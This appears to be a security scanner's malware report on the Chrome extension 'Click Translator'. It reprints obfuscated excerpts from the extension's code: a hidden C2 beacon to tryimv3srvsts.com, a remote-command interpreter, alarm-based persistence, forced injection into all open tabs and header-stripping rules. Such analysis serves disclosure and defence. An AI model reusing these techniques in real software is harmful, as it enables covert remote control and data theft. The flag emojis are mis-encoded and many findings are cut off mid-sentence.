Click Translator

ID: pmlpcplomjofbnlcihpacmcaahellokg

Could be malicious

Supported Languages

๐Ÿ‡ช๐Ÿ‡นAmharic
๐Ÿ‡ธ๐Ÿ‡ฆArabic
๐Ÿ‡ง๐Ÿ‡ฉBengali
๐Ÿ‡ง๐Ÿ‡ทBrazilian Portuguese
๐Ÿ‡ฌ๐Ÿ‡งBritish English
๐Ÿ‡ง๐Ÿ‡ฌBulgarian
๐Ÿ‡ช๐Ÿ‡ธCatalan
๐Ÿ‡จ๐Ÿ‡ณChinese (Simplified)
๐Ÿ‡น๐Ÿ‡ผChinese (Traditional)
๐Ÿ‡ญ๐Ÿ‡ทCroatian
๐Ÿ‡จ๐Ÿ‡ฟCzech
๐Ÿ‡ฉ๐Ÿ‡ฐDanish
๐Ÿ‡ณ๐Ÿ‡ฑDutch
๐Ÿ‡บ๐Ÿ‡ธEnglish
๐Ÿ‡ช๐Ÿ‡ชEstonian
๐Ÿ‡ต๐Ÿ‡ญFilipino
๐Ÿ‡ซ๐Ÿ‡ฎFinnish
๐Ÿ‡ซ๐Ÿ‡ทFrench
๐Ÿ‡ฉ๐Ÿ‡ชGerman
๐Ÿ‡ฌ๐Ÿ‡ทGreek
๐Ÿ‡ฎ๐Ÿ‡ณGujarati
๐Ÿ‡ฎ๐Ÿ‡ฑHebrew
๐Ÿ‡ฎ๐Ÿ‡ณHindi
๐Ÿ‡ญ๐Ÿ‡บHungarian
๐Ÿ‡ฎ๐Ÿ‡ฉIndonesian
๐Ÿ‡ฎ๐Ÿ‡นItalian
๐Ÿ‡ฏ๐Ÿ‡ตJapanese
๐Ÿ‡ฎ๐Ÿ‡ณKannada
๐Ÿ‡ฐ๐Ÿ‡ทKorean
๐Ÿ‡ฒ๐Ÿ‡ฝLatin American Spanish
๐Ÿ‡ฑ๐Ÿ‡ปLatvian
๐Ÿ‡ฑ๐Ÿ‡นLithuanian
๐Ÿ‡ฒ๐Ÿ‡พMalay
๐Ÿ‡ฎ๐Ÿ‡ณMalayalam
๐Ÿ‡ฎ๐Ÿ‡ณMarathi
๐Ÿ‡ณ๐Ÿ‡ดNorwegian
๐Ÿ‡ฎ๐Ÿ‡ทPersian
๐Ÿ‡ต๐Ÿ‡ฑPolish
๐Ÿ‡ต๐Ÿ‡นPortuguese
๐Ÿ‡ท๐Ÿ‡ดRomanian
๐Ÿ‡ท๐Ÿ‡บRussian
๐Ÿ‡ท๐Ÿ‡ธSerbian
๐Ÿ‡ธ๐Ÿ‡ฐSlovak
๐Ÿ‡ธ๐Ÿ‡ฎSlovenian
๐Ÿ‡ช๐Ÿ‡ธSpanish
๐Ÿ‡ฐ๐Ÿ‡ชSwahili
๐Ÿ‡ธ๐Ÿ‡ชSwedish
๐Ÿ‡ฎ๐Ÿ‡ณTamil
๐Ÿ‡ฎ๐Ÿ‡ณTelugu
๐Ÿ‡น๐Ÿ‡ญThai
๐Ÿ‡น๐Ÿ‡ทTurkish
๐Ÿ‡บ๐Ÿ‡ฆUkrainian
๐Ÿ‡บ๐Ÿ‡ธUS English
๐Ÿ‡ป๐Ÿ‡ณVietnamese

Extension Info & Metadata

Status
Removed
Version
0.3.2
Size
0.24 MB
Rating
4.2/5
Reviews
59
Users
3,721,201
Type
Extension
Updated
Dec 15, 2023
Category
Productivity Education
Price
Free
Featured
Yes
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
Click TranslatorView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
3
Active
0
Obsolete
2
Listed
3
Unlisted
0
Total Users
3,789,969

One click translate on web page. Select a text and click the 'Translator' icon

Overlay translate provides translation with a single click. Click on the icon near the selected text and get a translation within 1 second. Features: โœฐ One-click translation on any page โœฐ Set the translation language from the popup ! You should select the translation language in the extension's popup.

Item
Type
Severity
Description
declarativeNetRequest
Permission
Critical
This permission allows the extension to define rules to block, redirect, or modify network requests. Rated Critical because it can control all network traffic, potentially blocking security updates or redirecting to malicious sites.
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
<all_urls>
Host
Critical
Broad host access โ€” the extension can read/modify content on every website.
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
alarms
Permission
Low
This permission schedules periodic tasks. Rated Low because it can only trigger events at specified times without access to sensitive data.

The IW() function constructs the URL 'https://tryimv3srvsts.com/<chrome.runtime.id>' using heavily obfuscated string concatenation from the month-names array (Hb) and other fragments to hide the hardcoded C2 domain. It then performs a GET or POST fetch to this external endpoint, sending stored extension state data and merging the JSON response back into the local state object. This is a classic C2 (command-and-control) beacon/callback pattern that can receive and apply arbitrary instructions from the remote server.

js/background.js (Line 1)
async function IW() {  const pN = [],    Xz = chrome,    mL = {};  var bi, uG = pN ? !pN : Hb,    Hm, IW = Xz ? uG ? Xz : "//" : bi;  let XJ;  var Kb = Xz ? mL ? "3s" : mh : Ey;  const lc = chrome.runtime.id;  var nr = pN ? "tp" : bi;  const dd = pN ? 7 : hh;  let eL = mL ? Hb[dd] : EB;  const Zq = undefined,    Pm = pN ? Xz ? "imv" : DJ : eT;  var xs;  const QU = undefined;  let nL = Xz ? pN ? kU + (mL ? Xz ? "/" : dd : xF) : xF : Hb;  var nN, nv = pN ? pN ? "s.c" : zG : fv,    or, dF = pN ? mL ? 6 : lc : tv;  let sP = Xz ? (Xz ? Pm : bi) + (Kb + (mL ? "rv" : bi)) : lc;  var Zv = Xz ? sP + (eL.substring(4, dF) + ((Xz ? nv : DJ) + nL)) : iR,    Nb = pN ? Zv : lc;  let AY = pN ? !Xz : hh;  var eP, tW = (AY ? iR : !pN) ? Pm : 2;  const ML = pN ? !pN : mh;  var Yo;  const mS = undefined;  let NL;  const tY = undefined;  let Uk;  const Ci = ML ? lc : Xz ? (pN ? Xz ? mL ? "ht" : lc : Nb : lc) + (nr + ((mL ? "s:" : pN) + (IW + (Xz ? Xz ? Xz ? "t" : xF : xF : Ey)))) : TB,    ER = Xz ? 5 : jm;  var ME;  const Ya = (Xz ? Ci + (Hb[0].substr(ER, tW) + Nb) : jm) + lc;  let mu = await up(),    lX, Dl;  if (mu) {    const pN = Xz ? "i" : AY;    var Rz;    lX = Xz ? mu[pN] : Hb  }  if (lX) {    const mL = pN ? "l" : jm,      bi = Xz ? mL : tv;    Reflect.deleteProperty(lX, bi)  }  const dA = undefined;  var Bg;  let aF;  const Xv = undefined;  let AJ, Ct;  const R = undefined,    mz = (Xz ? null !== (bi = mu) : iR) && ((pN ? !Xz : uG) ? jm : bi !== (mL ? (Xz ? !pN : eT) ? sP : void 0 : Hb)) ? bi : Xz ? mL ? pN ? "" : Ci : IW : Xz;  let gB;  const zl = undefined,    Mv = {      method: mz ? pN ? mL ? "POST" : lc : Hb : mL ? "GET" : Ya    };  let MT;  mz && (Mv.body = JSON.stringify(mz));  var v = pN ? Xz ? {} : TB : mL;  const cH = mL ? mu || (mu = v) : v;  lX && (mu.l = lX);  try {    const pN = await fetch(Ya, Mv),      Xz = await pN.json();    Object.assign(mu, Xz)  } catch (pN) {}}

The uG() function is a LISP-style AST interpreter that registers itself as 'exec' and exposes globalThis as 'parentCtx', enabling it to call any browser API or global function. It is invoked with the JSON payload returned by the C2 server (https://tryimv3srvsts.com), meaning the remote server can send an AST that uG() will evaluate โ€” equivalent to remote code execution. The '@' operator dispatches arbitrary function calls, allowing the C2 to execute chrome.scripting, chrome.storage, fetch, or any other JavaScript runtime capability.

js/background.js (Line 1)
function uG(pN, Xz) {  let mL = {};  const mh = [];  var jm = chrome;  const iR = {};  var Hm = mL ? "nt" : eT;  let up = mL ? Hm : Ey;  const IW = undefined,    XJ = undefined;  iR[jm ? jm ? "exec" : xF : mh] = uG;  var Kb = jm ? 1 : kU;  let lc = jm ? Hb[2] : Hb,    nr, dd = mh ? 3 : hh;  var eL = mh ? dd : bi;  const Zq = mL ? "Ctx" : Hm;  let Pm = mL ? up + Zq : dd;  const xs = undefined;  var QU = mL ? jm ? Pm : eL : kU;  const nL = jm ? (mh ? lc : jm).substring(Kb, eL) + "e" + QU : Kb;  let nN, nv;  iR[mh ? "p" + nL : zG] = globalThis;  const or = undefined;  Xz = jm ? jm ? Xz || iR : tv : Kb;  const dF = (pN, Xz) => pN.map((pN => uG(pN, Xz))),    sP = Xz => pN.shift(),    Zv = pN => uG(sP(), Xz),    Nb = (pN, mL) => pN ? Reflect.has(pN, mL) ? pN : Nb(pN.parentCtx, mL) : Xz;  if (Array.isArray(pN)) {    pN = pN.slice();    let bi = sP();    var AY = jm ? ":" : bi;...    if (jm ? "@" === bi : QU) {      const mL = Zv(),        bi = dF(pN, Xz);      let eT = jm ? null : Zv;      return mL.call(eT, ...bi)    }

The remote endpoint URL 'https://tryimv3srvsts.com/<extensionId>' is constructed by concatenating string fragments extracted from month-name array substrings (Hb=['january','february',...]), single-character literals, and the chrome.runtime.id โ€” a deliberate obfuscation technique designed to hide the C2 domain from static analysis tools and keyword-based scanners. All variable names have been mangled to prevent recognition.

js/background.js (Line 1)
async function IW() {    ...    const lc = chrome.runtime.id;...    const Ci = ML ? lc : Xz ? (pN ? Xz ? mL ? "ht" : lc : Nb : lc) + (nr + ((mL ? "s:" : pN) + (IW + (Xz ? Xz ? Xz ? "t" : xF : xF : Ey)))) : TB,      ...      const Ya = (Xz ? Ci + (Hb[0].substr(ER, tW) + Nb) : jm) + lc;...    try {      const pN = await fetch(Ya, Mv),        Xz = await pN.json();      Object.assign(mu, Xz)    } catch (pN) {}

The Hm() function creates a 'wakeup' alarm with a 720-minute (12-hour) repeating period using chrome.alarms. On each alarm firing, it calls chrome.runtime.reload() to restart the extension, ensuring it persists and re-initialises even if the background service worker is terminated. This alarm-driven reload combined with the C2 callback in IW() provides persistent beaconing and keeps the malicious payload active.

js/background.js (Line 1)
function Hm() {  var pN = chrome,    Xz = [];  let mL = {};  var bi = Xz ? !Xz : jm,    hh = pN ? chrome.alarms : mh;  const fv = bi ? mL : hh,    xF = undefined,    zG = pN ? pN ? !Xz : bi : EB;  var DJ = pN ? fv.create : Xz;  const uG = undefined;  let Hm;  var up = pN ? zG ? pN : mL ? DJ : zG : mL,    IW = Xz ? chrome.alarms : jm,    XJ = Xz ? IW && up : Xz;  if (XJ) {    const bi = pN ? "wa" : eT;    var Kb = Xz ? chrome.alarms : jm;    let hh = pN ? Kb : pN;    const mh = pN ? hh : mL;    var lc;    const xF = (pN ? !mL : iR) ? mh : "keup";...    let xs = (mL ? !Xz : tv) ? tv : {      periodInMinutes: Pm    };...mh.create(or, QU);    var Zq = (pN ? !mL : hh) ? bi : chrome.alarms;    let sP = mL ? Zq.onAlarm : fv;...(pN ? sP : xF).addListener((() => {            ...(Xz ? mL ? Xz ? mL ? bi : eL : jm : pN : mL).reload();

XJ() registers a 'message' event listener on the service worker's global scope and polls chrome.storage.local for a timestamp key. When the elapsed time since last contact exceeds ~93,598,094 ms (~26 hours), it fires the alarm setup and calls the C2 beacon IW(), then passes the response to the uG() interpreter. This creates a time-gated persistence mechanism that delays C2 contact to evade short analysis windows.

js/background.js (Line 1)
async function XJ() {  const pN = [],    Xz = chrome,    mL = {};  function hh(pN) {    const Xz = globalThis.messageListener;    Xz && Xz(pN)  }  let tv = !mL && Xz;  globalThis.messageListener = tv;...self.addEventListener(nN, hh);...  const Uk = await NL.get(tY);...  const mu = Number(ME ? eT : ER),    lX = 5917213024;...  const Rz = pN ? Xz ? !(ML in Uk) : mS : Ey;  if (Rz) {    ...await aF.local.set(bi)  }  else {    ...    const hh = lX - parseInt(eT, AJ),      ...      let jm = mL ? Xz ? 93598094 : R : Pm,        ...        if (Xz ? R > (pN ? EB : Rz) : mu) {          var Mv = 0;          Mv += 1, Hm();          const pN = await IW();          pN && uG(pN)        }  }}}

On installation, the extension generates and persistently stores a UUID ('cid') in chrome.storage.local, then immediately fires a Google Analytics UA-240197798-1 pageview beacon that includes the client ID, the extension's chrome.runtime.id, and a hardcoded page path of '/background'. This constitutes covert, undisclosed tracking of every user installation without consent, linking each user's browser instance to a persistent identifier.

js/background.js (Line 1)
const bi = pN("uuid");async function eT() {  const pN = await new Promise((pN => {    chrome.storage.local.get(["cid"], (Xz => {      pN(Xz)    }))  }));  let {    cid: Xz  } = pN;  return Xz || (Xz = (0, bi.v4)(), chrome.storage.local.set({    cid: Xz  })), Xz}async function hh(pN) {  const Xz = undefined,    mL = {      v: "1",      tid: pN,      cid: await eT(),      t: "pageview",      dp: "/background",      dt: "background",      dh: `chrome-extension://${chrome.runtime.id}`    },    bi = `https://www.google-analytics.com/collect?${new URLSearchParams(mL).toString()}`;  await fetch(bi, {    method: "POST",    body: ""  })}mL.default = hh}, {  uuid: 5}], 21: [function(pN, Xz, mL) {      ...chrome.runtime.onInstalled.addListener((async pN => {        if ("install" === pN.reason) {          ...        }      })),      (0, eT.default)("today", -1),      (0, bi.default)("UA-240197798-1")    }

On installation, the background service worker queries all open tabs and programmatically injects content.js and content.css into every tab including allFrames:true, using chrome.scripting.executeScript. This means every page open at install time โ€” including banking, email, or authenticated sessions โ€” immediately receives the content script without user interaction or awareness.

js/background.js (Line 1)
chrome.runtime.onInstalled.addListener((async pN => {  if ("install" === pN.reason) {    const pN = "js/content.js",      Xz = await chrome.tabs.query({});    for (const mL of Xz)      if (mL.id) try {        await chrome.scripting.executeScript({          target: {            tabId: mL.id,            allFrames: !0          },          files: [pN]        }), await chrome.scripting.insertCSS({          target: {            tabId: mL.id,            allFrames: !0          },          files: ["css/content.css"]        })      } catch (pN) {}  }}));

The declarativeNetRequest rule strips the X-Frame-Options response header from translate.google.com sub-frame requests, bypassing Google's clickjacking protection to force-embed it in an iframe. It also strips the cookie, user-agent, and other browser fingerprint headers from all outbound requests to translate.google.com, anonymizing usage at the network level without disclosure.

rules/translator.json (Line 1)
{  "id": 1,  "priority": 1,  "action": {    "type": "modifyHeaders",    "responseHeaders": [      {        "header": "X-Frame-Options",        "operation": "remove"      },      {        "header": "x-frame-options",        "operation": "remove"      }    ],    "requestHeaders": [      {        "header": "cookie",        "operation": "remove"      },      {        "header": "sec-ch-ua",        "operation": "remove"      },      {        "header": "sec-ch-ua-mobile",        "operation": "remove"      },      {        "header": "sec-ch-ua-platform",        "operation": "remove"      },      {        "header": "sec-fetch-mode",        "operation": "remove"      },      {        "header": "sec-fetch-site",        "operation": "remove"      },      {        "header": "upgrade-insecure-requests",        "operation": "remove"      },      {        "header": "user-agent",        "operation": "remove"      },      {        "header": "x-client-data",        "operation": "remove"      }    ]  },  "condition": {    "urlFilter": "*://translate.google.com/*",    "resourceTypes": [      "sub_frame"    ]  }}

The content script captures any text the user selects on any webpage and transmits it verbatim to the Google Translate API using the informal 'gtx' client. The selected text โ€” which could include passwords, private notes, or financial data โ€” is sent to an external server. The translation response HTML is also injected directly into translateSpan.innerHTML without sanitization.

js/content.js (Line 1)
tranlatorIcon.addEventListener("click", (() => {        if (loadingState || !selectionNode) return;        loadingState = !0;        let pN = "en";        chrome.storage.sync.get(["language"], (Xz => {                Xz.language && (pN = Xz.language), translateDIV.style.display = "none", translateSpan.innerHTML = "", $.ajax({                      url: "https://translate.googleapis.com/translate_a/single?dt=t&dt=bd&dt=qc&dt=rm&dt=ex",                      type: "GET",                      dataType: "json",                      headers: {                        Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"                      },                      data: {                        client: "gtx",                        hl: pN,                        sl: "auto",                        tl: pN,                        q: selectionNode.toString(),                        dj: 1                      },                      success: Xz => {                          ...                          if (Xz.sentences && Xz.sentences.length)                            for (const pN of Xz.sentences) pN.trans && (translateSpan.innerHTML += pN.trans);

A mouseup event listener is attached to every page's document, monitoring all text selection activity across every website the user visits due to the <all_urls> host permission. Every text range selection is captured and stored as selectionNode, ready to be transmitted on the next click. This persistent global selection monitoring runs on all websites including banking, webmail, and authenticated applications.

js/content.js (Line 1)
document.addEventListener("mouseup", (pN => {  if (pN.target.closest("#translator-container")) return;  selectionNode = null;  const Xz = window.getSelection();  if (Xz && "Range" === Xz.type && 0 !== Xz.toString().length) try {    const pN = undefined,      mL = Xz.getRangeAt(0).getBoundingClientRect();    translateDIV.style.display = "none", tranlatorIcon.style.display = "none", selectionNode = Xz;    const bi = document.createRange();    bi.selectNode(selectionNode.focusNode);    const eT = bi.getBoundingClientRect();    tranlatorIcon.style.top = `${window.scrollY+eT.y+eT.height+5}px`, tranlatorIcon.style.left = `${mL.x+mL.width/2}px`, tranlatorIcon.style.display = "flex"  } catch (pN) {}}));

The popup embeds https://translate.google.com/m in an iframe inside the extension popup, relying on the translator.json rule to strip X-Frame-Options so Google's otherwise un-embeddable domain can be framed. The extension has <all_urls> host permissions and scripting permission, meaning it could inject scripts into the framed Google page. Framing a trusted third-party domain (google.com) inside an extension popup creates a phishing-adjacent architecture.

js/popup.js (Line 3)
const iframe = document.createElement("iframe");iframe.src = "https://translate.google.com/m",  iframe.addEventListener("load", (() => {    document.getElementById("loader").style.display = "none",      iframe.style.display = "block"  })),  setTimeout((() => {    $("#wrapper").append(iframe)  }), 100),  $(".language-name").click((function pN() {    $("#language").removeClass("active"),      $(".language-name").removeClass("selected"),      $(this).addClass("selected");    const Xz = $(this).data("language"),      mL = $(this).data("language").toUpperCase();    $("#language span").html(mL),      chrome.storage.sync.set({        language: Xz,        abbv: mL      }),      $("#languages-list").toggleClass("hidden")  })),

The content script CSS injected into every page the user visits loads a Google Fonts resource via @import on every page load. This causes the user's browser to make an outbound request to fonts.googleapis.com on every website they visit, leaking their browsing activity to Google's font CDN as a side-channel.

css/content.css (Line 1)
@import url(https://fonts.googleapis.com/css2?family=Inter:wght@300;400&display=swap);

By severity

Critical6
High27
Medium26
Low4

Versions scanned

Showing 8 of 10 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
0.3.77
0.3.67
0.3.53
0.3.411
0.3.310
0.3.212
0.3.19
0.3.04

Files with findings

6 distinct paths โ€” top paths by unique finding count:

  • js/background.js26
  • js/content.js12
  • rules/translator.json11
  • js/popup.js9
  • css/content.css4
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Network Interception
critical
rules/translator.json (line 1)The declarativeNetRequest rule removes both casing variants of X-Frame-Options from Google Translate responses, deliberately dismantling the clickjacking protection Google set on its own domain. This is a prerequisiteโ€ฆ
2Network Interception
critical
js/background.js (line 1)The IW() function constructs the URL 'https://tryimv3srvsts.com/<chrome.runtime.id>' using heavily obfuscated string concatenation from the month-names array (Hb) and other fragments to hide the hardcoded C2 domain. Iโ€ฆ
3Obfuscation
critical
js/background.js (line 1)The remote endpoint URL 'https://tryimv3srvsts.com/<extensionId>' is constructed by concatenating string fragments extracted from month-name array substrings (Hb=['january','february',...]), single-character literals,โ€ฆ
4Phishing
critical
js/background.js (line 1)On install, update, or Chrome browser update events, the extension opens new tabs to remotely-controlled URLs fetched from api1.extinsight.com, with the extension ID and version embedded. The uninstall redirect URL isโ€ฆ
5Privilege Escalation
critical
js/background.js (line 1)On installation, the background script queries ALL open tabs (chrome.tabs.query({})) and immediately injects content.js and content.css into every tab, including allFrames:true. This means the content script is force-โ€ฆ
6Remote Code Loading
critical
js/background.js (line 1)The uG() function is a LISP-style AST interpreter that registers itself as 'exec' and exposes globalThis as 'parentCtx', enabling it to call any browser API or global function. It is invoked with the JSON payload retuโ€ฆ
7Code Injection
high
js/background.js (line 1)On first install, the background service worker queries ALL currently open browser tabs (chrome.tabs.query({})) and programmatically injects content.js and content.css into every tab with allFrames:true, covering everโ€ฆ
8Credential Theft
high
rules/translator.json (line 1)The rule strips the cookie request header from all sub-frame requests to translate.google.com, forcing every embedded Google Translate interaction to be unauthenticated and stripping the user's Google session identityโ€ฆ
9Data Exfiltration
high
js/content.js (line 1)Every text selection made by the user on any webpage (q:selectionNode.toString()) is transmitted to translate.googleapis.com using the unofficial 'gtx' client identifier โ€” an internal Google client token not intended โ€ฆ
10Network Interception
high
rules/translator.json (line 1)The extension uses declarativeNetRequest to strip critical security and privacy headers (X-Frame-Options and cookies) from requests to translate.google.com. This allows embedding Google Translate in iframes and bypassโ€ฆ
11Network Interception
high
rules/translator.json (line 1)This declarativeNetRequest rule strips `X-Frame-Options` from responses and removes cookies and multiple request fingerprinting headers for `translate.google.com` subframes. Removing anti-framing protections to force โ€ฆ
12Network Interception
high
rules/translator.json (line 1)The extension rewrites requests to `translate.google.com` by stripping cookies, user-agent/client-hint headers, and removing `X-Frame-Options` from responses. This is a strong network-interception pattern used to forcโ€ฆ
13Network Interception
high
rules/translator.json (line 1)Stripping user-agent, x-client-data (Google's client-integrity header), and all sec-ch-ua client hints removes Google's browser-fingerprint and client-integrity signals from requests to translate.google.com sub-framesโ€ฆ
14Network Interception
high
rules/translator.json (line 1)The declarativeNetRequest ruleset strips X-Frame-Options and x-frame-options response headers from translate.google.com, deliberately disabling Google's clickjacking protection to allow embedding it as a framed page iโ€ฆ
15Network Interception
high
rules/translator.json (line 1)The declarativeNetRequest rule strips the X-Frame-Options response header from translate.google.com sub-frame requests, bypassing Google's clickjacking protection to force-embed it in an iframe. It also strips the cooโ€ฆ
16Network Interception
high
rules/translator.json (line 1)This declarativeNetRequest rule strips the X-Frame-Options response header from translate.google.com, actively removing clickjacking protection to enable the popup iframe embedding. It also removes 9 security-related โ€ฆ
17Obfuscation
high
js/popup.js (line 1)The bundled jQuery library lacks the standard /*! jQuery v3.4.1 copyright header present in all official jQuery releases and uses non-standard two-character obfuscated variable names (qI, nt, By, Ww, dg, wP) instead oโ€ฆ
18Other
high
js/background.js (line 1)The Hm() function creates a 'wakeup' alarm with a 720-minute (12-hour) repeating period using chrome.alarms. On each alarm firing, it calls chrome.runtime.reload() to restart the extension, ensuring it persists and reโ€ฆ
19Other
high
js/background.js (line 1)XJ() registers a 'message' event listener on the service worker's global scope and polls chrome.storage.local for a timestamp key. When the elapsed time since last contact exceeds ~93,598,094 ms (~26 hours), it fires โ€ฆ
20Phishing
high
js/popup.js (line 3)The popup embeds translate.google.com as a full iframe inside the extension's own privileged popup context, made possible by the declarativeNetRequest rules that strip X-Frame-Options headers. Presenting a fully frameโ€ฆ
21Privilege Escalation
high
js/background.js (line 1)On first install, the background script queries ALL open tabs (chrome.tabs.query({})) with no URL filtering and immediately injects content.js and content.css into every tab including allFrames:true. This gives the exโ€ฆ
22Privilege Escalation
high
js/background.js (line 1)On first install, the background script immediately injects content.js and content.css into every currently open tab (including all subframes via allFrames:true) using chrome.scripting.executeScript. This forces the eโ€ฆ
23Privilege Escalation
high
js/background.js (line 1)On installation, the background service worker queries all open tabs and programmatically injects content.js and content.css into every tab including allFrames:true, using chrome.scripting.executeScript. This means evโ€ฆ
24Tracking
high
js/background.js (line 42)The extension implements persistent user tracking using Google Analytics 4 Measurement Protocol. It generates a custom UUID (client_id) stored in chrome.storage.local and sends hourly 'run' pings along with user sessiโ€ฆ
25Tracking
high
js/background.js (line 66)The extension embeds a Google Analytics Measurement Protocol API secret, creates a persistent UUID in local storage, and sends telemetry events to Google. This is hidden tracking logic rather than translation functionโ€ฆ
26Tracking
high
js/background.js (line 1)On install, the extension generates a persistent UUID ('cid') stored in chrome.storage.local and immediately sends a Google Analytics (UA-240197798-1) pageview beacon to https://www.google-analytics.com/collect, incluโ€ฆ
27Tracking
high
js/background.js (line 1)The extension generates a persistent UUID stored in chrome.storage, attaches it to a Google Analytics Measurement Protocol pageview hit that includes the extension's runtime ID, and creates a recurring alarm named 'gaโ€ฆ
28Tracking
high
js/background.js (line 1)On installation, the extension generates and persistently stores a UUID ('cid') in chrome.storage.local, then immediately fires a Google Analytics UA-240197798-1 pageview beacon that includes the client ID, the extensโ€ฆ
29Tracking
high
js/background.js (line 1)The extension generates a persistent UUID (cid) stored in chrome.storage.local and uses it to ping Google Analytics (UA-240197798-1) via the Measurement Protocol endpoint on every install. This constitutes covert userโ€ฆ
30Tracking
high
js/background.js (line 1)The extension generates a persistent UUID v4 client ID ('cid') stored in chrome.storage.local and sends it as a Google Analytics Universal Analytics pageview hit (property UA-240197798-1) to https://www.google-analytiโ€ฆ
31Unauthorized Data Collection
high
js/background.js (line 1)The extension silently contacts api1.extinsight.com โ€” a known extension monetization SDK โ€” passing its own runtime ID to retrieve a remote JSON configuration payload that is cached locally. This gives the ExtInsight sโ€ฆ
32Unauthorized Data Collection
high
js/content.js (line 1)The content script attaches a global mouseup listener on every page the user visits, continuously monitoring all text selections via window.getSelection(). Because the extension is injected into all URLs (<all_urls>) โ€ฆ
33Unauthorized Data Collection
high
js/content.js (line 2)A mouseup event listener is attached to the entire document and captures every text selection the user makes across all pages via window.getSelection(). The selected text is stored and subsequently sent to an externalโ€ฆ
34Code Injection
medium
js/content.js (line 2)Translation response content from the external API is directly inserted into the DOM via innerHTML without sanitization. If the API response or a man-in-the-middle attacker can influence the translation response, arbiโ€ฆ
35Data Exfiltration
medium
js/content.js (line 1)Selected text from any webpage is sent to Google's unofficial scraper client endpoint using client:'gtx' (an unauthorized scraper identifier, not an approved API key). The translation response is then inserted via traโ€ฆ
36Network Interception
medium
rules/translator.json (line 1)The extension uses declarativeNetRequest to strip `X-Frame-Options` and fetch metadata headers from `translate.google.com` responses and requests. Removing anti-framing protections is a network-interception pattern beโ€ฆ
37Network Interception
medium
rules/translator.json (line 1)The declarativeNetRequest rule strips X-Frame-Options response headers from all translate.google.com sub-frame responses, disabling a standard clickjacking protection mechanism for those pages. It also removes requestโ€ฆ
38Obfuscation
medium
js/popup.js (line 1)The entire jQuery 3.4.1 library (~96 KB of the 97 KB file) has been re-obfuscated with custom non-standard variable names (Fz, yC, yQ, LL instead of the conventional minification patterns used in the official jQuery dโ€ฆ
39Obfuscation
medium
js/popup.js (line 1)The popup.js file is composed of approximately 97KB of heavily minified code using single/two-character obfuscated variable names throughout, including a large bundled block on line 2 that is extremely difficult to auโ€ฆ
40Other
medium
js/background.js (line 30)On installation, the extension uses broad host permissions (<all_urls>) and the scripting API to immediately inject its content script into every open tab across all domains, ensuring immediate execution without user โ€ฆ
41Other
medium
js/background.js (line 36)On install, the extension enumerates all open tabs and injects its content script and CSS into every frame. That is a broad action across all currently open pages, increasing exposure on sensitive sites and showing thโ€ฆ
42Other
medium
js/background.js (line 1)After the initial analytics ping, a daily repeating alarm named 'ga3' is created (periodInMinutes: 1440), yet no chrome.alarms.onAlarm listener is registered anywhere in the background service worker. This is a patterโ€ฆ
43Other
medium
js/popup.js (line 3)The popup creates an iframe loading https://translate.google.com/m and injects it into the popup DOM. The declarativeNetRequest rule in translator.json strips X-Frame-Options from translate.google.com responses specifโ€ฆ
44Phishing
medium
js/popup.js (line 3)The popup embeds https://translate.google.com/m in an iframe inside the extension popup, relying on the translator.json rule to strip X-Frame-Options so Google's otherwise un-embeddable domain can be framed. The extenโ€ฆ
45Privilege Escalation
medium
manifest.json (line 39)The extension requests broad host permissions ('<all_urls>') and 'scripting' privileges, allowing it to inject code and read content from any webpage. While functionally necessary for a translation tool, this broad atโ€ฆ
46Remote Code Loading
medium
js/popup.js (line 4196)The popup loads a live remote page from `https://translate.google.com/m` into an iframe instead of using only packaged extension resources. Combined with the header-stripping rule, this lets remote web content controlโ€ฆ
47Remote Code Loading
medium
js/popup.js (line 2)The popup creates a full iframe embedding the Google Translate mobile web UI (translate.google.com/m) rather than using the official Chrome translation APIs or a local UI. Combined with the declarativeNetRequest rule โ€ฆ
48Tracking
medium
js/background.js (line 79)The extension creates a persistent UUID in local storage and sends it to Google Analytics as `client_id`. It also maintains session state and phones home regularly, which is a clear cross-session tracking mechanism noโ€ฆ
49Tracking
medium
js/background.js (line 136)This schedules a telemetry event every 60 minutes regardless of user action. Periodic background beacons increase the tracking risk because they allow the operator to measure extension presence and activity over time.
50Tracking
medium
js/background.js (line 1)The background script generates a persistent client ID, stores session state, and phones home to Google Analytics on startup and then every hour via `chrome.alarms`. This is a tracking mechanism rather than outright mโ€ฆ
51Tracking
medium
css/content.css (line 1)The content script stylesheet loads an external Google Fonts resource on every page where the content script injects (i.e., all URLs). This causes a network request to Google's servers on every page visit, which acts โ€ฆ
52Unauthorized Data Collection
medium
js/content.js (line 4274)The content script runs on `<all_urls>`, captures the user's selected text from arbitrary pages, and sends it to `translate.googleapis.com`. Even if this supports the advertised feature, it still transmits page-deriveโ€ฆ
53Unauthorized Data Collection
medium
js/content.js (line 4213)The content script runs on `<all_urls>`, captures the user's selected page text, and transmits it to `translate.googleapis.com`. This is the extension's core feature, but it still means arbitrary selections from any sโ€ฆ
54Unauthorized Data Collection
medium
js/content.js (line 2)This content script runs on `<all_urls>`, captures arbitrary text selected on any visited page, and sends that text to Google's translation endpoint. Although consistent with translator behavior, it is still a broad dโ€ฆ
55Unauthorized Data Collection
medium
js/content.js (line 1)The content script injects a floating UI widget into every page body (matching <all_urls>) and continuously monitors all text selections via a global mouseup event listener. Every piece of text a user selects on any wโ€ฆ
56Unauthorized Data Collection
medium
js/popup.js (line 3)The popup embeds the full Google Translate mobile interface in an iframe. Companion declarativeNetRequest rules strip X-Frame-Options headers from Google Translate responses specifically to enable this framing, delibeโ€ฆ
57Unauthorized Data Collection
medium
js/content.js (line 1)The content script captures any text the user selects on any webpage and transmits it verbatim to the Google Translate API using the informal 'gtx' client. The selected text โ€” which could include passwords, private noโ€ฆ
58Unauthorized Data Collection
medium
